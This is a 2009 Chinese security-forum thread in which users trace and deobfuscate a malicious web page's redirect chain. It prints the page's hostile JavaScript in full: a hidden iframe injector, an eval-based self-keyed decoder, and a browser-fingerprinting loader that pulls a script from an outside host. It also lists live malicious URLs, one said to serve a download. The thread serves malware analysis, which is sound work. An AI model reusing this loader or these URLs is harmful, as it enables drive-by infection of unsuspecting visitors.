
kekao - 2009-7-6 19:12:00
请教一下.详细说明一下过程:kaka1: 谢谢!(恶意网址,不要随便打开)

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
gtyre2 - 2009-7-6 20:16:00
不是恶意网站吧
网盾进去没报



引用:
http://omyakicari.com/images/wait.html


页面上有一段ShellCode
取这段


引用:
<script language="javascript">
// Decoded, the percent-escaped argument below is:
//   <div style='position: absolute; left:-100%; width:100%; height:100%;'>
//     <iframe style='width:100%;height:2000' width='100%' height='2000' scrolling='no'
//             frameborder='no' marginwidth='0' marginheight='0'
//             src='http://simpa-lux.com/ts/in.cgi?baggi6'></iframe>
//   </div>
// i.e. an iframe inside a container pushed entirely off-screen (left:-100%), so the
// redirect chain loads without anything visible to the visitor. The escaping only hides
// the markup from a casual look at the source; unescape()+document.write of an <iframe>
// is a pattern worth flagging when scanning page content.
document.write( unescape( '%3C%64%69%76%20%73%74%79%6C%65%3D%27%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%6C%65%66%74%3A%2D%31%30%30%25%3B%20%77%69%64%74%68%3A%31%30%30%25%3B%20%68%65%69%67%68%74%3A%31%30%30%25%3B%27%3E%3C%69%66%72%61%6D%65%20%73%74%79%6C%65%3D%27%77%69%64%74%68%3A%31%30%30%25%3B%68%65%69%67%68%74%3A%32%30%30%30%27%20%77%69%64%74%68%3D%27%31%30%30%25%27%20%68%65%69%67%68%74%3D%27%32%30%30%30%27%20%73%63%72%6F%6C%6C%69%6E%67%3D%27%6E%6F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%6E%6F%27%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%27%30%27%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%27%30%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%73%69%6D%70%61%2D%6C%75%78%2E%63%6F%6D%2F%74%73%2F%69%6E%2E%63%67%69%3F%62%61%67%67%69%36%27%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%64%69%76%3E' ) );
</script>

然后弹窗得到



引用:
http://simpa-lux.com/ts/in.cgi?baggi6
xiaoqiang305 - 2009-7-6 20:23:00
freshow直接esc一下就出来了~~但楼主问的肯定不是这个,是往下怎么解
gtyre2 - 2009-7-6 20:41:00
出来这些:kaka6:

Log is generated by FreShow.
[wide]http://omyakicari.com/images/wait.html
    [frame]http://w-netex.com/pore/?7876256053563003de306eb5c094240d
    [frame]http://linotraffic.com/ts/in.cgi?410
kekao - 2009-7-6 22:21:00
能否继续解了.看看是否能下载什么?
gtyre2 - 2009-7-6 22:31:00
无网马:kaka6:
kekao - 2009-7-7 10:23:00
:kaka6: 竟然说没有网马.网马时刻在更新
gtyre2 - 2009-7-7 10:30:00
今天进去网盾报的是这个


引用:
http://brasilianstoree.info/k.php?btn

不过还是解不了:kaka6:
shadowmin - 2009-7-7 12:07:00
关于:hxxp://brasilianstoree.info/k.php?btn解密的日志(全体输出 -  3):

Level  0>http://brasilianstoree.info/k.php?btn
Level  1>http://brasilianstoree.info/k.php?rgljklxskwkkzkekkkffygjezwkejzyjrugkkyiwcwlrwxzz0800
Level  2>http://brasilianstoree.info/k.php?rgljklxskwkkzkekkwffygjezwkejzyjrugkkyiwcwlcjzkkkckkszkkkkkkkkke

日志由 Redoce1.9第68次修正版于 2009-7-7 12:10:21 生成。
只解出这么多,然后就连不上了。
kekao - 2009-7-7 13:18:00
请问你这个是如何得到下两个地址的,详解一下.
shadowmin - 2009-7-7 16:39:00
打开http://brasilianstoree.info/k.php?btn
对代码处理后,如下:
然后在神器中运行。

// Self-keyed decoder forming the outer layer of the k.php page. Deobfuscated, it:
//   - takes its own source text via arguments.callee.toString() and, when a location
//     object is reachable, appends location.href to it (the rAOENu0lF.length != 2 test
//     is always true, rAOENu0lF being "" at that point);
//   - walks that text to fill a small numeric key table (JQpq7aGLd) — so the key depends
//     on the exact bytes of this function AND on the URL it was served from;
//   - parses the second argument (OC7jn1Pr4) as hex byte pairs, subtracts the key slots
//     0..3 in rotation (S3G5oMghl), wraps negatives back into byte range (+129, +127),
//     builds the result with String.fromCharCode and evals it through the alias
//     Xalhb105M = eval;
//   - if that eval throws, sets window.location = "/" (xkh3444F0): a wrong key quietly
//     sends the browser to the site root instead of surfacing an error.
// The first parameter (SYstgSMNf) is never read. Analysis note: beautifying this
// function, altering its ";;;{ }/***/" filler, or running it from a different origin
// changes the derived key and hence the decoded output — the filler is key material,
// not just padding, which is why the page's call (truncated below) must be decoded
// with the function text left byte-for-byte intact.
function YUyPQ3Rh5 (SYstgSMNf,/***/ OC7jn1Pr4) { var qYl064D4m = 0;;{ }/***/ var rAOENu0lF = "";;;{/***/ }/***/ var xkh3444F0 = "/";{ }/***/ var T1yegnHAl = qYl064D4m;;;;{ } try { qYl064D4m = window;;;;{/***/}/***/ }/***/ catch (e ) { } var TbEtbe6hA = arguments;;;{/***/}/***/ try { T1yegnHAl = location;;;{/***/ }/***/ }/***/ catch(e ) {/***/ } var m87gBKDjN = TbEtbe6hA. callee;;;{ }/***/ m87gBKDjN = m87gBKDjN.toString ( );{/***/ } var Xalhb105M = eval;;;;{/***/ } if (T1yegnHAl && rAOENu0lF.length != 2 ) {/***/ m87gBKDjN += T1yegnHAl. href;;;;{/***/ } } var qvRCt5hj6 = 4;;;;{/***/ } var GA1nM8T8v = 0;;;;{/***/} var JQpq7aGLd = new Array;;;{}/***/ var GIApJcIO1 = GA1nM8T8v;{/***/}/***/ while (GIApJcIO1 < m87gBKDjN.length) { var upqgK5O1X = m87gBKDjN. charAt(GIApJcIO1 );;;{} GIApJcIO1++;;;;{/***/ } var dfuO8jR8E = 100;{ } var tAR1mjk4u = parseInt (upqgK5O1X );;{/***/ }/***/ if (dfuO8jR8E != 100) { tAR1mjk4u = 0;{ }/***/ }/***/ if (!isNaN(tAR1mjk4u )) { tAR1mjk4u += 20;;;;{}/***/ if (qvRCt5hj6 == 4 ) {/***/ qvRCt5hj6 = 0;;;;{/***/ } tAR1mjk4u += 20;;;;{/***/ } }/***/ else {/***/ tAR1mjk4u += 20;;{/***/} }/***/ tAR1mjk4u += 8;{ } if (GA1nM8T8v < 4 ) { JQpq7aGLd [qvRCt5hj6 ] = tAR1mjk4u;;{/***/ } } else {/***/ JQpq7aGLd [qvRCt5hj6] += tAR1mjk4u;;;;{ } }/***/ GA1nM8T8v++;;;;{/***/ }/***/ if (JQpq7aGLd [qvRCt5hj6] > 256) {/***/ JQpq7aGLd [qvRCt5hj6] -= 256;;;{ }/***/ } qvRCt5hj6++;;;;{}/***/ }/***/ }/***/ var S3G5oMghl = 0;{/***/ } var aB3Va4CUx = 1;;;;{} aB3Va4CUx--;{/***/ }/***/ while (aB3Va4CUx < OC7jn1Pr4. length ) { var V36RNvP1n = parseInt(OC7jn1Pr4. substring(aB3Va4CUx, aB3Va4CUx + 2 ), 16 );{/***/}/***/ if (S3G5oMghl >= 4) {/***/ S3G5oMghl = 0;{/***/} }/***/ var Qb73uJrL8 = JQpq7aGLd [S3G5oMghl ];;;{ } S3G5oMghl++;;;;{ } aB3Va4CUx++;;;;{/***/}/***/ var Hvs1DTKt1 = V36RNvP1n - Qb73uJrL8;{/***/} if (Hvs1DTKt1 < 1 && Hvs1DTKt1 != 0) {/***/ Hvs1DTKt1 += 129;{/***/} Hvs1DTKt1 += 127;;;{ }/***/ }/***/ aB3Va4CUx++;{ } rAOENu0lF += String. 
fromCharCode (Hvs1DTKt1 );;;{ } }/***/ var T2JHamyNk = 11;;;;{/***/ } try { Xalhb105M (rAOENu0lF );;;;{/***/ }/***/ }/***/ catch (e ) {/***/ T2JHamyNk = 1;;;;{} }/***/ if (qYl064D4m && T2JHamyNk < 10 ) { qYl064D4m.location = xkh3444F0;;{/***/ }/***/ } }/***/
YUyPQ3Rh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


得到如下代码。

// Filler left behind by the obfuscator: bare numeric literals, empty blocks and
// empty comments. None of it has a runtime effect.
5;/**/{}/**/
9;;/**/
{}8;

; ;3;{}


// Nibble-to-letter mapper. Every hexadecimal digit of the input is replaced by
// the letter at that index in a fixed 16-letter alphabet (0 -> 'K', 1 -> 'W', ...,
// f -> 'Z'); the mapping is one-to-one, so an analyst can reverse it by looking up
// each letter's position. If any character is not a hex digit, the input is
// returned unchanged. The loader below uses it to turn the victim fingerprint
// (service-pack code + hex-encoded language) into the letters-only suffix that
// is appended to the k.php script URL.
function WAiAASBD(Ed6_dsgw)
{
    // Alphabet indexed by nibble value 0..15.
    var alphabet = "KWYjyFeScXigulRZ";
    var encoded = '';
    var pos = 0;

    while (pos < Ed6_dsgw.length) {
        var nibble = parseInt(Ed6_dsgw.charAt(pos), 16);

        // A non-hex character aborts the mapping and hands the input back as-is.
        if (isNaN(nibble)) {
            return Ed6_dsgw;
        }

        encoded += alphabet.charAt(nibble);
        pos++;
    }

    return encoded;
}


// Obfuscator filler (bare literals, empty blocks, empty comments); no runtime effect.
; /**/
{}

6;
;


/**/3;8;
9;
; ;


0;/**/
// Three marker properties set on the document. Nothing in this listing reads them
// back — presumably a "stage already ran" flag for the script loaded below; unverified.
document.XV7Xq80V = 1;

document.REygHqYf = 1;

document.xJVtbjPa = 1;





// Fingerprint, part 1: Windows service pack. navigator.appMinorVersion is an
// Internet Explorer-only property whose value on Windows typically carries tokens
// such as ";SP2;". The loop scans for ";SP" and reads the digit 3 positions later,
// mapping it to a two-digit code: "01" = none found, "02".."07" = SP1..SP6,
// "08" = a "Release Candidate" build with no SP token.
var NzprQCvd;

var o2gIvPIq = navigator.appMinorVersion;

var oL7oqZQS = -1

var pi6oBqUw = "01";



while((oL7oqZQS = o2gIvPIq.indexOf(";SP", oL7oqZQS+1)) != -1) {

var T1aZANQB = o2gIvPIq.charAt(oL7oqZQS+3);



if (T1aZANQB == "1")

pi6oBqUw = "02";

else if (T1aZANQB == "2")

pi6oBqUw = "03";

else if (T1aZANQB == "3")

pi6oBqUw = "04";

else if (T1aZANQB == "4")

pi6oBqUw = "05";

else if (T1aZANQB == "5")

pi6oBqUw = "06";

else if (T1aZANQB == "6")

pi6oBqUw = "07";



if (pi6oBqUw != "01")

break;

}



if (pi6oBqUw == "01" && o2gIvPIq.indexOf("Release Candidate", 0) != -1)

pi6oBqUw = "08";





// Fingerprint, part 2: navigator.systemLanguage (also IE-only), first 10 characters,
// each char code written as hex and the whole thing zero-padded to at least 20 hex
// digits so the suffix length is stable.
var xp8LKL2T = navigator.systemLanguage.substr(0, 10);

var vGhFcQjS = "";





// NOTE(review): as pasted, this line has its identifiers case-mangled
// (XP8LKL2T.LENGTH / Y2QX11MO); a case-sensitive engine would throw a
// ReferenceError here. This looks like a transcription artifact of the forum post
// rather than the original code.
for(var y2qx11MO=0;y2qx11MO<XP8LKL2T.LENGTH;Y2QX11MO++) {

// JEizwtZb is assigned without var, i.e. it becomes an implicit global.
JEizwtZb = xp8LKL2T.charCodeAt(y2qx11MO).toString(16);



// JEizwtZb is a hex *string*, so "< 2" coerces it numerically and this pad only
// fires for char codes 0 and 1 — presumably .length was intended. Harmless here.
if (JEizwtZb < 2)

vGhFcQjS += "0";



vGhFcQjS += JEizwtZb;

}



while(vGhFcQjS.length < 20)

vGhFcQjS += "00";





// The two fingerprint parts are concatenated (re-declaring NzprQCvd with var is
// legal and harmless) and pushed through WAiAASBD, yielding a letters-only string
// that is a deterministic function of service pack + language (e.g. "01"+"00"
// maps to "KWKK"). A <script> element whose src is the attacker's k.php plus that
// suffix is then injected, so the server can pick the next stage per victim
// profile. Exposing WAiAASBD on window presumably lets that next stage reuse the
// mapper — not verifiable from this listing.
var NzprQCvd = pi6oBqUw + vGhFcQjS;

NzprQCvd = WAiAASBD(NzprQCvd);

window.WAiAASBD = WAiAASBD;

var mJR7VMOF = document.createElement("script");

mJR7VMOF.setAttribute("type", "text/javascript");

mJR7VMOF.setAttribute("src", "http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKKFFygjeZWKeFcjYXRcWKYWuWcZKSeZZ" + NzprQCvd);

document.body.appendChild(mJR7VMOF);


shadowmin - 2009-7-7 16:56:00
看上面的代码:

"http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKKFFygjeZWKeFcjYXRcWKYWuWcZKSeZZ" + NzprQCvd


要获取NzprQCvd的值,根据上面的代码构造如下代码:

// Copy of the page's nibble-to-letter mapper, kept so the harness below can be run
// on its own. Each hex digit of the input selects one letter from a fixed
// 16-entry table (index = digit value); a non-hex character makes the function
// return its input unchanged. The mapping is injective, so the produced suffix can
// be decoded back to the original hex by position lookup.
function WAiAASBD(Ed6_dsgw)
{
    var letters = ['K', 'W', 'Y', 'j', 'y', 'F', 'e', 'S', 'c', 'X', 'i', 'g', 'u', 'l', 'R', 'Z'];
    var result = '';

    for (var idx = 0; idx < Ed6_dsgw.length; idx += 1) {
        var value = parseInt(Ed6_dsgw.charAt(idx), 16);
        if (isNaN(value)) return Ed6_dsgw;
        result = result + letters[value];
    }

    return result;
}

// Analyst harness: rebuilds the query-string suffix the loader derives from
// navigator data, with fixed stand-in values ("01" = no service pack token found,
// "00" = empty language string) fed through the page's mapper. The final eval()
// is not meant to execute anything — presumably the decoding tool hooks eval and
// displays its argument, which for this input is the string KWKK shown below.
var pi6oBqUw = "01";
var vGhFcQjS = "00";
var NzprQCvd = WAiAASBD(pi6oBqUw + vGhFcQjS);
eval(NzprQCvd);


在神器中运行后得到值

KWKK


所以地址为:

http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKKFFygjeZWKeFcjYXRcWKYWuWcZKSeZZKWKK


打开这个页面,得到的代码直接在神器中解密,得到地址

http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKYFFygjeZWKeFcjYXRcWKYWuWcZuijKKKWKKSZKKKKKKKKKYK


此地址可以下载到文件。正确与否,未知。
shadowmin - 2009-7-7 17:09:00
关于:hxxp://omyakicari.com/images/wait.html解密的日志(全体输出 -  6):

Level  0>http://omyakicari.com/images/wait.html
Level  1>http://trafing.net/in.php
Level  2>http://linotraffic.com/ts/in.cgi?cut4
Level  2>http://brasilianstoree.info/k.php?btn
Level  3>http://brasilianstoree.info/k.php?feygrskjkwkkzkekkkffygjezwkefcjyxrcwkywuwczksezzkwkk
Level  1>http://linotraffic.com/ts/in.cgi?410

日志由 Redoce1.9第68次修正版于 2009-7-7 17:12:58 生成。